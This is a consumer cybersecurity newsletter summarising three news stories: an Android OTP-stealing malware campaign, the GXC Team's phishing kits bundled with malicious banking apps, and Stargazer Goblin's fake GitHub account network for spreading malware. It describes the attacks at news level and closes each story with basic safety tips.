Android Malware Alert! πŸ“±

Aug 02 2024

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome toΒ Gone Phishing,Β your weekly cybersecurity newsletter that’s always wins the gold against the hackers πŸ₯‡πŸ₯‡πŸ₯‡

Now let’s delve into this week’s hottest cybersecurity news stories:Β 

  • πŸ‘Ύ 100k+ malware Android apps deployed to steal OTP codes πŸ‘¨πŸ»β€πŸ’»

  • 🎣 Phishing kits bundled with malicious Android apps by AI πŸ€–

  • ✨ 'Stargazer Goblin' creates 3,000 fake GitHub accounts 🎭

Paranoid, Android? πŸ‘€

🚨 Android Malware Alert! πŸ“±

A large-scale campaign using malicious Android apps has been stealing users' SMS messages since February 2022. Over 107,000 unique malware samples have been found, targeting one-time passwords (OTPs) for identity fraud. 😱 

🌐 Global Reach

Victims have been detected in 113 countries, with India and Russia hit hardest, followed by Brazil, Mexico, the U.S., Ukraine, Spain, and Turkey. This malware is intercepting OTPs from over 600 global brands. 🌎

πŸ•΅οΈ How It Works

  • Deceptive Ads: Victims are tricked into installing malicious apps through fake ads mimicking Google Play Store listings or Telegram bots.

  • SMS Access: Once installed, these apps request access to SMS messages and transmit them to one of 13 command-and-control (C2) servers. πŸ“²

⚠️ Hidden Threat

The malware stays hidden, monitoring incoming SMS messages for OTPs used in online account verification. This allows hackers to commit identity fraud and create fake accounts. πŸ”

πŸ’Έ Payment Methods

Threat actors behind this campaign accept cryptocurrency and other payments to fuel a service called Fast SMS (fastsms[.]su), selling access to virtual phone numbers. πŸ’°

πŸ” Google’s Response

Google Play Protect, enabled by default on devices with Google Play Services, offers automatic protection against known malware versions. πŸ›‘οΈ

πŸš€ Continued Threat

Malicious actors continue to abuse Telegram for malware distribution and C2 operations. Recent discoveries include SMS Webpro and NotifySmsStealer targeting users in Bangladesh, India, and Indonesia. πŸ“©

πŸ’» Expanding to Other Platforms

The malware ecosystem is growing, with TgRAT, a Windows remote access trojan, now including a Linux variant. This malware can download files, take screenshots, and run commands remotely. πŸ–₯️

πŸ›‘οΈ Stay Safe

  • Avoid Suspicious Apps: Only download apps from trusted sources.

  • Enable Google Play Protect: Ensure it’s active on your device.

  • Be Wary of Phishing: Don't click on suspicious links in messages or emails. πŸ•΅οΈβ€β™‚οΈ

Stay vigilant and protect your personal information! πŸ›‘οΈ

The Daily Newsletter for Intellectually Curious Readers

  • We scour 100+ sources daily

  • Read by CEOs, scientists, business owners and more

  • 3.5 million subscribers

Sign up today!

I’d rather be phishing 🎣 

🚨 GXC Team's Malicious Android Apps Campaign Unveiled! πŸ“±

The GXC Team, a Spanish-speaking cybercrime group, has been bundling phishing kits with malicious Android apps, elevating malware-as-a-service (MaaS) offerings to a new level. πŸ•΅οΈβ€β™‚οΈ

πŸ“… Timeline & Reach

Tracked by Group-IB since January 2023, this campaign targets users of 36 Spanish banks, governmental bodies, and 30 institutions worldwide. They’ve identified 288 phishing domains and affected users in countries like the U.S., U.K., Slovakia, and Brazil. 🌎

πŸ›‘οΈ How It Works

  • Phishing Kits: Sold for $150 to $900 a month, targeting financial and governmental services.

  • Malicious Apps: Bundled with the phishing kit for $500/month, designed to intercept OTPs and SMS messages. πŸ“²

πŸš€ Attack Method

Victims are tricked into downloading fake banking apps via smishing or deceptive ads. These apps request permissions to become the default SMS app, intercepting OTPs and other messages, and sending them to a Telegram bot controlled by the attackers. πŸ•΅οΈβ€β™€οΈ

πŸ”’ Advanced Features

AI-Powered Calls: AI tools generate convincing voice calls to extract 2FA codes or trick users into installing more malicious apps.

WebView Exploits: The app opens genuine bank websites to appear legitimate while stealing information. πŸ“ž

πŸ› οΈ Services Offered

  • Stolen Credentials: Sale of banking credentials.

  • Custom Coding: For other cybercriminals targeting financial institutions and cryptocurrency exchanges. πŸ’Έ

πŸ”¬ Security Insights

  • AI in Phishing: AI-powered voice cloning mimics human speech, making phishing schemes more convincing.

  • Adversary-in-the-Middle (AiTM): Phishing kits with AiTM capabilities lower the barrier for large-scale phishing campaigns.

  • Progressive Web Apps (PWAs): Used to create fake login pages for phishing. πŸ›‘οΈ

πŸ“’ Expert Warnings

Phishing kits with AiTM capabilities can manipulate authentication flows, breaking into accounts even protected by passkeys. Attackers use techniques like embedding encoded scripts in error prompts, tricking users into running malicious PowerShell commands. πŸ–₯️

πŸ” Stay Safe

  • Avoid Suspicious Links: Be cautious of emails or messages prompting app downloads.

  • Check App Permissions: Scrutinise app permissions, especially for SMS access.

  • Use Robust Security Measures: Keep security software updated and enable protections like Google Play Protect. πŸ›‘οΈ

Stay vigilant against evolving cyber threats! πŸš€

He’s Goblin up GitHub accounts πŸ§Ÿβ€β™‚οΈ

🚨 Stargazer Goblin's Malware Distribution Network on GitHub! 🌐

A threat actor known as Stargazer Goblin has established a network of inauthentic GitHub accounts to fuel a Distribution-as-a-Service (DaaS) scheme. This operation has netted them $100,000 in illicit profits over the past year. πŸ’ΈΒ 

πŸ“… Timeline & Reach

Active since August 2022, the network consists of over 3,000 accounts and thousands of repositories used to share malicious links or malware. Check Point has dubbed this operation the "Stargazers Ghost Network." 🌌

πŸš€ Attack Method

  • Malware Propagation: The network distributes various information-stealing malware, including Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine.

  • Bogus Accounts: These accounts engage in starring, forking, watching, and subscribing to repositories to lend a veneer of legitimacy. πŸ‘»

πŸ› οΈ Services Offered

  • Phishing Repository Templates: Accounts serving phishing templates.

  • Image Provisioning: Accounts providing images for phishing templates.

  • Malware Distribution: Accounts pushing malware to repositories as password-protected archives masquerading as cracked software and game cheats. πŸ•ΉοΈ

πŸ”’ Advanced TacticsΒ 

  • Resilience to Takedowns: When malicious repositories are flagged and accounts banned, Stargazer Goblin updates links to new active malicious releases, minimising disruption.

  • Compromised Accounts: Evidence suggests some accounts were compromised, likely through stealer malware, to add legitimacy and expand the network. πŸ”„

πŸ“’ Security Insights

Stealth Techniques: By making accounts appear legitimate through normal user activities, the network avoids detection.

Sophisticated Operation: Utilising multiple accounts performing different activities (starring, hosting, committing) minimises losses when GitHub intervenes. 🌐

πŸ“‰ Campaign Impact

Check Point discovered a campaign where a GitHub repository link led to a PHP script on a WordPress site, delivering an HTML Application (HTA) file to execute Atlantida Stealer via a PowerShell script. Other propagated malware includes Lumma Stealer, RedLine Stealer, Rhadamanthys, and RisePro. πŸ›‘οΈ

πŸ–₯️ Multi-Platform Presence

Beyond GitHub: The network extends to other platforms like Discord, Facebook, Instagram, X, and YouTube, where similar 'Ghost' accounts operate. πŸ“±Β 

🚨 Recent Developments

  • Extortion Campaign: Since February 2024, unknown actors have targeted GitHub repositories, wiping contents and demanding ransom via Telegram.Β 

  • Phishing Attacks: Developers targeted with phishing emails, tricked into authorising malicious OAuth apps that erase repositories. πŸ“¨

πŸ” Securing Your Repositories

Cross Fork Object Reference (CFOR) Vulnerability: Truffle Security warns that sensitive data from deleted forks and repositories can still be accessed. Organisations must secure against this vulnerability, as private and public repository data may be more accessible than believed. πŸ›‘οΈ

πŸ› οΈ GitHub's Design Decisions

GitHub’s documentation clarifies that commits to any repository in a fork network can be accessed from any repository in the same network, including upstream repositories. This design decision can lead to unexpected data exposure. πŸ”

πŸ” Key Takeaways

  • Vigilance Needed: Regularly monitor and secure repositories against unauthorised access.

  • Be Aware: Understand GitHub's data access policies to protect sensitive information.

  • Stay Updated: Follow security advisories and implement recommended measures to safeguard your data. πŸ›‘οΈ

Stay alert and protect your code from evolving cyber threats! πŸš€

That’s all for this week, cyber squad!

πŸ—žοΈ Extra, Extra! Read all about it! πŸ—žοΈ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • πŸ›‘οΈ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday πŸ“…

  • πŸ’΅Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for πŸ†“

  • πŸ“ˆBitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future πŸ‘Ύ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

Recent articles